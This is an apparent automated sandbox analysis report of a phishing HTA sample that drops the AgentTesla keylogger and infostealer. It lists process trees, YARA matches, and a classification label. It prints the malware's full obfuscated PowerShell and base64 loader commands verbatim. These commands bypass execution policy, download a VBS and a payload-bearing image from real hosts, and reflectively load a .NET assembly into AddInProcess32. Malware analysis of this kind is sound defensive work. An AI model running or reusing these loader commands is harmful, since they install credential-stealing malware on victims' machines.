'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4616, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_030CA920	10_2_030CA920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_030C50CF	10_2_030C50CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_030C9FE6	10_2_030C9FE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01164AA0	12_2_01164AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_0116DD88	12_2_0116DD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01163E88	12_2_01163E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_011641D0	12_2_011641D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_0116AB10	12_2_0116AB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01161A3D	12_2_01161A3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01167A91	12_2_01167A91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_06604200	12_2_06604200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_06603050	12_2_06603050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_066059A8	12_2_066059A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_06602338	12_2_06602338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_06600040	12_2_06600040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_066052C0	12_2_066052C0

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2046
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2482
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2046	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2482	Jump to behavior

Source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Process Memory Space: powershell.exe PID: 4616, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 10.2.powershell.exe.95265d0.0.raw.unpack, 9O2OLI.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, hdYUG.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, LGBZ4N2f.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, F8OmG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, Bgo.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, k7FmsUgnvL.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, dVjkZ3EEsen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, dVjkZ3EEsen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, dVjkZ3EEsen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.95265d0.0.raw.unpack, dVjkZ3EEsen.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@20/20@2/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujlalfbm.aqm.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: seethebestthingswithgreatsituationshandletotheprogress.hta

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestthingswithgreatsituationshandletotheprogress.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
